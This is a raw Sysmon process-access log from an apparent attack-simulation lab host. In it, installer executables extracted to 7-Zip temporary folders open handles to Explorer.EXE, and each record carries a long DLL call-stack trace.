13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000015647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000015646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000015645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000015643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000015642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000015641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000015639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000015634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000015633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000015631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
